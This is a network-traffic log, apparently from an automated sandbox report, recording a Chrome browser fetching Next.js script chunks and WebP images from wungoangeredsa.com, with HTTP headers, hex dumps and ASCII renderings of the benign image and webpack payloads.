                                                                                                          Date: Mon, 06 Jan 2025 11:09:25 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-17b"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1058
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:25 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb417bcac543aa-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:25 UTC386INData Raw: 31 37 62 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 34 30 36 36 5d 2c 7b 34 34 30 36 36 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 66 5f 31 2e 65 64 32 38 33 65 66 35 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 59 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 6f 41 41 41 44 77 41 51 43
                                                                                                          Data Ascii: 17b"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[44066],{44066:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/f_1.ed283ef5.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlYAAABXRUJQVlA4IEoAAADwAQC
                                                                                                          2025-01-06 11:09:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          114192.168.2.450166104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:25 UTC497OUTGET /_next/static/chunks/20a35a44b4f8b20a-1736072686539.c29d864a1f4963e0.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:25 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:25 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-183"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1058
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:25 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb417befe7433d-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:25 UTC394INData Raw: 31 38 33 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 39 38 30 37 5d 2c 7b 33 39 38 30 37 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 6d 5f 34 2e 34 35 39 65 37 64 39 36 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 77 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 46 41 41 41 41 44 51 41 51 43
                                                                                                          Data Ascii: 183"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[39807],{39807:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_4.459e7d96.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlwAAABXRUJQVlA4IFAAAADQAQC
                                                                                                          2025-01-06 11:09:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          115192.168.2.450167104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:25 UTC497OUTGET /_next/static/chunks/9d01a94e442e71b2-1736072686539.1f0bd67ad15ff842.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:26 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:26 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-17c"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1059
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:26 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb417d89db440c-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:26 UTC387INData Raw: 31 37 63 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 38 33 37 36 5d 2c 7b 35 38 33 37 36 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 66 5f 32 33 2e 31 65 61 37 64 36 30 39 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 67 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 77 41 41 41 43 77 41 51
                                                                                                          Data Ascii: 17c"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[58376],{58376:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/f_23.1ea7d609.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlgAAABXRUJQVlA4IEwAAACwAQ
                                                                                                          2025-01-06 11:09:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          116192.168.2.450169104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:26 UTC464OUTGET /_next/static/media/f_24.a0b04b39.webp HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:26 UTC498INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:26 GMT
                                                                                                          Content-Type: image/webp
                                                                                                          Content-Length: 14024
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: "677a5f14-36c8"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 990
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:26 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Accept-Ranges: bytes
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41830ebe430d-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:26 UTC871INData Raw: 52 49 46 46 c0 36 00 00 57 45 42 50 56 50 38 20 b4 36 00 00 30 2c 01 9d 01 2a 00 02 00 02 3e 6d 30 92 46 24 25 21 a1 2f 32 9b 68 a0 0d 89 67 6e 72 78 3a 17 aa 7f a7 fb 1b e5 33 db 9e de bb 0b c7 7f 82 7a ab c5 fe 1f f3 40 1f 04 27 4f 32 fc 23 ca 56 dc ae e3 a2 7e bb f9 dd c2 7d 61 fc ef fb f7 f2 4e 64 7c 43 f9 97 f7 df ea df ba 5f e3 fd 0f fd 6f fa 3f 8c 27 87 7f 79 ff 6f ee 07 fc 3b f9 af f7 7f ea 1f bb 5f e6 f9 d3 3f 87 f2 0f 61 2f f7 7f c2 ff ec ff 5c f3 1b fe 9b f9 47 c0 bf a1 ff ec 3f a3 7e 39 7d b9 fe 85 ff c5 fe df e9 1b f8 07 50 37 f1 4f e0 5f f2 bf b4 fb 66 fd 5f ff 07 f6 8f f6 1f bb 9d 28 9f c2 7f f4 7f 7b f6 00 e9 00 e9 2e 82 d7 9f 42 e6 0b f2 6f 22 74 f5 b9 7d b7 4f 39 f9 cf f0 73 f9 df de 3c 91 fc 7f e9 1f de 7f 7a ff 31 ed df fb 36 69 fd 3b
                                                                                                          Data Ascii: RIFF6WEBPVP8 60,*>m0F$%!/2hgnrx:3z@'O2#V~}aNd|C_o?'yo;_?a/\G?~9}P7O_f_({.Bo"t}O9s<z16i;
                                                                                                          2025-01-06 11:09:26 UTC1369INData Raw: 94 f2 d4 03 f9 69 43 4a 9d 18 c4 19 cd 7b fd 48 f4 1e b0 84 9f ac a6 43 2a 5c fa e9 0e d4 55 80 4e e8 b3 77 47 b9 ba 23 be 15 c9 43 3e 27 41 c5 76 e8 19 e1 98 68 00 e7 c0 b6 36 ad 92 6b 51 2c ba 07 64 a0 9c 62 d2 ca 0b ce e0 6a c0 cf 02 62 c1 10 6d 79 81 e5 bc 48 b5 50 c6 8b 55 f5 65 08 fe ea 42 44 f6 41 04 bd c9 3d f1 cc 02 7b 84 30 cb f5 d9 d5 dd 10 83 1a c0 b5 a8 00 d9 67 01 b8 5c 8b 0f f3 33 42 07 73 7a 67 84 b0 11 e6 ef fe 25 b2 00 e2 42 fc 0b 8e fb 90 45 e9 dc 68 c2 61 a0 04 43 a2 c6 1a d1 f1 cd 6a f8 69 5d 91 0a e9 17 27 01 fb 15 9f 0c ad 9f 84 fb c0 82 49 2d af c2 35 c2 30 4d ae 9f a8 ae d6 07 57 b5 32 7a bb 2f b1 03 76 e7 d2 18 b2 b8 f4 a2 75 c8 97 71 97 da b5 8c 7e 20 05 6d 64 f8 b1 32 05 cc ee fa 6c 2c 81 54 08 ee 5d 1b 1d e9 65 02 6b 73 e2 33
                                                                                                          Data Ascii: iCJ{HC*\UNwG#C>'Avh6kQ,dbjbmyHPUeBDA={0g\3Bszg%BEhaCji]'I-50MW2z/vuq~ md2l,T]eks3
                                                                                                          2025-01-06 11:09:26 UTC1369INData Raw: 60 8c 76 7e e0 9a 32 ac 81 f2 df ca 99 36 85 4c 53 40 12 eb 09 4f d2 e9 9d d2 3b ad cc 30 29 3d 3a ca 31 fe 22 85 2c 22 03 39 1e 1d 40 ad 7b 43 4c 06 7d 34 0f ea f3 32 dc f4 63 58 e6 bb eb 0d 7b 07 e7 1d 5a 3d 0b d8 2b ed b4 c0 62 7d 0c d1 30 82 a4 7e ff fc ef 57 3e 56 3d 76 2d 7e 08 0b 24 87 77 21 57 f9 9a fd 5e fe 2d 6f 56 b7 45 91 42 fd d5 72 91 36 9d 15 61 1e 8d 34 cf ee 0d 30 af c6 42 23 9d 80 38 bf dd 72 5b 7c a5 0e 64 de e2 cc 35 5f 17 ad 98 12 52 94 25 67 02 65 bc b5 8d 0f 82 6b 23 07 9e bd 68 42 ba 08 17 d2 c7 65 14 ed c2 f6 62 ae cd f4 de b4 f6 0b 0b 00 00 fe f0 79 de 17 fd fe f3 47 bf 6c d8 38 45 35 2c a5 3b ab ba d5 04 c5 82 30 96 fb 18 44 f3 e6 98 3e 32 29 2d 13 cb 49 1f ff e7 53 27 9d 46 7d af c3 1c 66 8f 6b 9e 05 07 43 ea b1 ea f9 86 9d c3
                                                                                                          Data Ascii: `v~26LS@O;0)=:1","9@{CL}42cX{Z=+b}0~W>V=v-~$w!W^-oVEBr6a40B#8r[|d5_R%gek#hBebyGl8E5,;0D>2)-IS'F}fkC
                                                                                                          2025-01-06 11:09:26 UTC1369INData Raw: c6 d2 f1 82 63 e4 90 5a d4 b0 f8 85 04 b1 da 3d fc 49 3a fa 23 17 51 b3 e7 db 70 a4 69 85 ec db 3a ee d5 8c e5 6d 9d 16 90 2b cb 00 e7 da 0c 5e 44 e2 08 de 13 52 4e 80 01 9d f8 cc 87 a5 dc 9a b8 09 cb ff c8 6d 7b 34 f7 86 2e 8e 28 08 4c 35 58 e9 8a 2b 3d 06 83 42 ce 92 2b 12 67 b7 f4 dd bd 11 4b c1 1f de 52 c3 a3 67 73 83 51 3a 46 82 f5 d6 a5 09 33 ae 21 55 df 4e 79 5c be aa 34 71 e6 d9 24 d4 79 54 e4 c8 de 73 55 be 4c 4b 8c e4 3d d2 af 43 78 28 32 26 18 97 49 8f f0 38 57 ca 17 4c 83 7f 5f 8c 34 99 de 36 3c f3 33 ca 9b 33 18 d6 0a 82 f2 13 3a cb 61 6b 8f db 19 27 d0 74 9e 74 fa d2 35 d2 9b af 84 7b 17 bf 9c be 0a 76 b7 be 6f e2 2f ba 49 4e d8 dd dc ff 92 47 f7 0e cf 29 81 bf 0a be dc df f2 a7 89 fe 61 8b 97 cc ee 21 f2 e2 c7 0d cb 3f 2a 0a a7 f7 65 a5 de
                                                                                                          Data Ascii: cZ=I:#Qpi:m+^DRNm{4.(L5X+=B+gKRgsQ:F3!UNy\4q$yTsULK=Cx(2&I8WL_46<33:ak'tt5{vo/ING)a!?*e
                                                                                                          2025-01-06 11:09:26 UTC1369INData Raw: 70 5b c7 58 87 e9 bf 82 83 b6 3e 53 90 14 ef 88 fa e6 01 dd 73 97 a7 5f a8 32 fe fd f1 1c de b5 93 3c cc 93 e1 4c d1 9f c4 af cf 11 a0 1f 88 08 b7 c2 36 df 3b 26 91 fd fe 86 8a e2 9c 40 29 b1 20 9e 51 6f da 24 4c 21 68 25 21 84 74 ff d1 86 89 47 04 15 a2 93 1d 74 13 d7 b7 c9 92 b6 69 4a f9 4a 50 40 f4 01 af 21 0e 4d 2a fc df 09 81 7e 8f ee 3e d8 7a fe 61 7c fd 3d bb f8 1a 28 9c 1f 4e 27 88 2a 56 3c 8e c0 a6 2f ff e3 0d 35 58 b7 ee 41 be a3 99 1d 3e 0c f6 2d 33 78 32 27 5a 43 a1 c4 10 87 94 5b 6d df bd 22 a3 32 9f 5f 55 df 34 e4 e4 ea d3 c3 97 8b 99 49 8e 26 27 81 7a c3 94 33 be 51 d2 ce 07 0a fa f9 0b ec 65 1b 3f 75 d7 10 63 d8 7b fc 13 a6 f5 27 97 01 e2 3c 2c 85 fa 3e ef 13 43 5d c8 4a 4c bd b8 5f 1d 4c 55 f6 8b bd 98 97 a4 84 18 b5 0c 01 6b 4c 82 30 08
                                                                                                          Data Ascii: p[X>Ss_2<L6;&@) Qo$L!h%!tGtiJJP@!M*~>za|=(N'*V</5XA>-3x2'ZC[m"2_U4I&'z3Qe?uc{'<,>C]JL_LUkL0
                                                                                                          2025-01-06 11:09:26 UTC1369INData Raw: f7 72 5e dd 58 4b 70 09 b3 7d 58 78 77 0d 53 31 de 14 49 23 cd e3 5a 2d b0 ed 6e 77 57 ee 4d 25 45 1b ce f8 2a 9b 63 7e 60 7d 9c 03 06 4a 4a ae f7 fe bf fa 4f d9 d2 65 79 b6 40 72 33 e2 2e 34 7a 83 fd 6a ab db 8c fd 47 89 de 85 aa 82 5d 9a 2d 23 9c e0 39 08 08 cd db da ed 78 85 de 6c d3 8e e0 3b c3 cc aa e5 7f c6 2c be a5 f8 87 cb bd 98 f4 75 fe 55 b7 0a ac 2e 16 f2 8f f9 be 62 4c 82 be f7 f4 89 f8 f1 58 8f 49 4d b2 f7 ec dc 8c 83 4e 34 1a 93 7f 77 4a aa 3c db ac 5e d8 3a 8e bb 31 79 4a b8 c7 d3 ee 30 6f 93 17 1e 06 65 cd d0 15 4d f4 98 8e b0 6d 04 8b 21 f2 16 e0 60 f0 c7 f5 9b 3b 48 c6 49 f4 60 49 a0 13 26 47 f1 f4 c2 eb 1b 92 f0 60 1e 29 a5 bd 48 05 44 d4 34 e0 ca b6 7f db de 53 b3 8c 24 2a a9 8b d4 16 48 6c a1 d3 24 f2 3c 6e 0d c7 23 51 55 bb 9a 3b 7f
                                                                                                          Data Ascii: r^XKp}XxwS1I#Z-nwWM%E*c~`}JJOey@r3.4zjG]-#9xl;,uU.bLXIMN4wJ<^:1yJ0oeMm!`;HI`I&G`)HD4S$*Hl$<n#QU;
                                                                                                          2025-01-06 11:09:26 UTC1369INData Raw: 5c 34 04 ba 4c 48 7c 47 fc b4 9a b9 da c5 20 ff 78 5c 60 b2 df d7 24 22 c5 bd b2 70 88 00 be 87 47 ae ee 57 15 76 e6 35 c4 6c 77 9d b5 c5 0d 24 15 58 5d 09 5a 1b 1c 34 46 04 cf 40 02 cc 31 ec da 65 bd 6d e2 14 8f 6f 8f 83 ec ca 4a e6 59 ad 10 41 7d 4c be 60 2e aa af f6 45 b7 0a a1 69 19 d3 a3 4f 95 92 d9 6c 72 31 db 2a 8a 73 5e 7a 00 78 10 5a c3 39 38 e4 cc b8 d0 d8 56 e4 95 e7 83 70 38 8e 43 be 2f 22 bf 88 6a a8 bb b8 d9 68 68 0f 77 3a 0c f9 be a1 05 e8 58 ba 20 6d 30 4d 29 42 4b fd cf 67 ed 53 6c dc 2b 2a b0 99 31 0c 88 1d 9c c0 72 10 a8 0a 11 59 2f e0 c2 20 1e c7 d1 83 db 95 63 6a 7e f8 a3 2f 24 94 22 ba 2f 43 0a a2 f1 9b 71 83 91 87 d5 7f 4b 0d b0 6e 60 e1 1b bc 3f f3 bd ef bb 07 45 26 3a e8 11 18 46 39 f1 e3 1c 6a c1 68 86 f6 88 c9 b7 00 7b 66 bc e4
                                                                                                          Data Ascii: \4LH|G x\`$"pGWv5lw$X]Z4F@1emoJYA}L`.EiOlr1*s^zxZ98Vp8C/"jhhw:X m0M)BKgSl+*1rY/ cj~/$"/CqKn`?E&:F9jh{f
                                                                                                          2025-01-06 11:09:26 UTC1369INData Raw: 94 46 1d 87 01 b4 b0 c4 8c 45 31 f6 ca ab d3 36 fc 02 04 d2 6d 3a 5f ef b2 af 0e 1f c6 15 39 bf 12 21 6e a7 72 0e 36 60 51 bc 16 83 d6 03 4c d1 36 10 32 d0 21 60 9d 10 d3 fc 25 5d f2 f2 b8 18 c4 88 bd 74 90 b8 00 80 5d 0b 26 3a 33 2d 3f a7 17 70 b0 12 f2 a3 13 bb 97 c0 39 b5 92 d9 e4 e4 53 49 f1 dc 4d a8 59 90 f9 b7 d5 64 3f 91 f4 e0 aa 5e 01 85 2f a7 a7 b8 72 9b 26 51 67 18 e9 8f 3b 83 05 4c 5f 35 43 a9 39 e3 c4 6e 72 b3 0d f2 0a c6 e2 ae 9d 0a 1e a0 a7 fc f1 fa 56 90 34 92 0e 9b 48 a9 4e e3 95 ec e5 26 a4 d6 06 3f 6e 09 c8 ff 2a 2a 71 73 dc e4 53 a0 79 ef 7c 4a 62 0e 47 2c 18 0f bc fa 9b 5b 99 c2 cd b6 c3 0c 02 79 6f 32 ef 86 ad e6 fc 62 f6 b7 d1 98 7e 60 b0 9b f2 54 5b 0b 10 4d 8b 89 29 db 59 7c 2a 6b 12 d3 35 6d a6 1b a2 72 15 93 bd b7 a2 74 4f b5 1c
                                                                                                          Data Ascii: FE16m:_9!nr6`QL62!`%]t]&:3-?p9SIMYd?^/r&Qg;L_5C9nrV4HN&?n**qsSy|JbG,[yo2b~`T[M)Y|*k5mrtO
                                                                                                          2025-01-06 11:09:26 UTC1369INData Raw: 30 e9 fc 01 dc b0 38 d8 6b be 16 01 00 6f ae 32 d6 05 03 a1 6d 9b 61 a8 02 80 c5 c3 54 d4 4d 87 7a b1 37 92 0d e0 c4 bf 89 36 dd 8c 1a b0 b8 31 97 93 21 52 c3 f4 96 82 83 82 62 20 56 70 6c 83 ec b4 07 4e c2 99 d3 63 df 52 75 81 9b 31 51 0f 51 7a 5a 02 b7 50 75 cf 3a 1e 56 bc c2 65 af 74 3b 33 24 eb e1 8f bf 93 14 9c 3b 56 a9 aa eb 24 18 12 47 e8 78 03 4a 37 e5 d1 7f 7e a4 cb 73 6a b4 ce 25 0b ee 4e df 00 3d 77 1e b4 a4 4d 6c 8f 72 7d 7f b6 ee 77 44 bb 20 4f e6 bf 0e f6 f5 8a e2 7b 20 c3 b7 5e 2f 0c ff 3a 51 b7 58 38 5d b2 52 58 85 3d 50 d4 ad 6e e5 e7 4d 36 6b b5 8f bb bd b6 30 9f be 61 e0 f7 40 40 b6 70 28 3d 47 ce 62 6b 71 0a 7c 5c 84 54 99 ea 2c a5 fd bc eb 77 91 b7 dd 3d 9d 9c 66 1d 46 09 16 ef 97 1d 2b ac a9 83 5a 1c 91 35 3e b7 b4 4e a0 62 44 68 d4
                                                                                                          Data Ascii: 08ko2maTMz761!Rb VplNcRu1QQzZPu:Vet;3$;V$GxJ7~sj%N=wMlr}wD O{ ^/:QX8]RX=PnM6k0a@@p(=Gbkq|\T,w=fF+Z5>NbDh
                                                                                                          2025-01-06 11:09:26 UTC1369INData Raw: 0e 57 93 c0 99 9f 68 2e 71 3c aa 8c 8a 1e b0 e3 b8 33 ad fd 09 97 95 b8 e5 b2 17 e7 22 da 01 8f fe 31 6a 3e 1a 27 e1 90 85 e0 15 56 0c c1 8c 56 29 7b cf 9a 6f 2b 2b 69 0d ea aa 9c 3e 3f 0f e6 fa c0 87 e5 1d 6a 43 79 e6 2c bd 35 28 c7 f7 2d 42 b6 04 b5 68 6e 59 f2 77 80 6c b0 1d 90 4b d7 73 74 a8 00 67 38 71 d4 4b 4f 38 45 a0 c2 5a 82 b8 ba 4d 1a f0 9c 06 80 7d 17 81 45 4e 16 9c 47 d8 45 d0 d4 f0 3c 67 1e 9b cf ab e9 28 ce 60 a9 c7 3b c7 9e 88 c4 6d d4 7a 7d 2e 56 eb 1a e1 57 10 f6 66 ec 79 a6 fd 01 d1 91 61 8b 4c f8 3a bd ef 0f 27 47 a0 01 09 10 77 3f 75 ac 6a 66 a7 c6 50 6c 6a d4 1c 76 19 15 d9 72 0a 96 c6 ac 95 74 01 ff 84 af 83 e8 46 f2 15 e8 c1 10 48 5a 75 81 72 fe cb b6 8b 67 76 23 84 21 e8 b8 5e e2 1b 2d 0e 8f 20 3c d5 33 73 6d 7e 23 25 6f 6e 62 e6
                                                                                                          Data Ascii: Wh.q<3"1j>'VV){o++i>?jCy,5(-BhnYwlKstg8qKO8EZM}ENGE<g(`;mz}.VWfyaL:'Gw?ujfPljvrtFHZurgv#!^- <3sm~#%onb


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          117192.168.2.450168104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:26 UTC497OUTGET /_next/static/chunks/dc0be3deba0a9b89-1736072686539.5b2e1a67b76350ce.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:26 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:26 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-234"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1059
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:26 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4182ec580f70-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:26 UTC571INData Raw: 32 33 34 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 35 34 39 31 5d 2c 7b 39 35 34 39 31 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 72 29 7b 72 2e 72 28 65 29 3b 76 61 72 20 74 3d 72 28 39 32 32 32 38 29 2c 63 3d 72 28 39 33 38 38 38 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 76 61 72 20 6e 3d 28 30 2c 74 2e 5a 29 28 5b 22 5c 6e 20 20 70 6c 61 63 65 2d 73 65 6c 66 3a 20 63 65 6e 74 65 72 3b 5c 6e 20 20 68 65 69 67 68 74 3a 20 34 30 70 78 3b 5c 6e 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 5c 6e 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 33 30 30 70 78 3b 5c 6e 20 20 62 6f 72 64 65 72 2d
                                                                                                          Data Ascii: 234"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[95491],{95491:function(n,e,r){r.r(e);var t=r(92228),c=r(93888);function o(){var n=(0,t.Z)(["\n place-self: center;\n height: 40px;\n width: 100%;\n max-width: 300px;\n border-
